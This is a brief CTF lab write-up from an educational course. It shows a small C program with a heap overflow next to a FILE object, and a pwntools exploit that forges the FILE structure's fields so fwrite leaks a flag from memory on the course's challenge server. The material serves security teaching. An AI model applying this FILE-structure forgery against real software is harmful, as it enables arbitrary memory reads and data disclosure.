Simple PWN 0x22(Lab - `AAR`)

Posted on | Post modified | In |

Simple PWN 0x22(Lab - AAR)

tags: CTF PWN eductf

Version: Ubuntu 20.04

Original Code

:::spoiler Original Code

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>

char flag[0x10] = "FLAG{TEST}\n";

int main()
{
    FILE *fp;
    char *buf;

    buf = malloc(0x10);
    fp = fopen("/tmp/meow", "w");
    read(0, buf, 0x1000);
    fwrite(buf, 0x10, 1, fp);
    return 0;
}

:::

Exploit - heap overflow + overlap flag

from pwn import *

# r = process('./chal')
r = remote('edu-ctf.zoolab.org', 10010)

context.arch = 'amd64'

flag_addr = 0x404050

raw_input()
payload = flat(
    p64(0)*4,
    p64(0xfbad0800),        #_flags
    p64(0),                 #_IO_read_ptr
    p64(flag_addr),         #_IO_read_end
    p64(0),                 #_IO_read_base
    p64(flag_addr),         #_IO_write_base
    p64(flag_addr+0x10),    #_IO_write_ptr
    p64(0)*8,               #_IO_write_end + _IO_buf_base + _IO_buf_end + _chain
    p64(0x1)                #_fileno
)

r.send(payload)

r.interactive()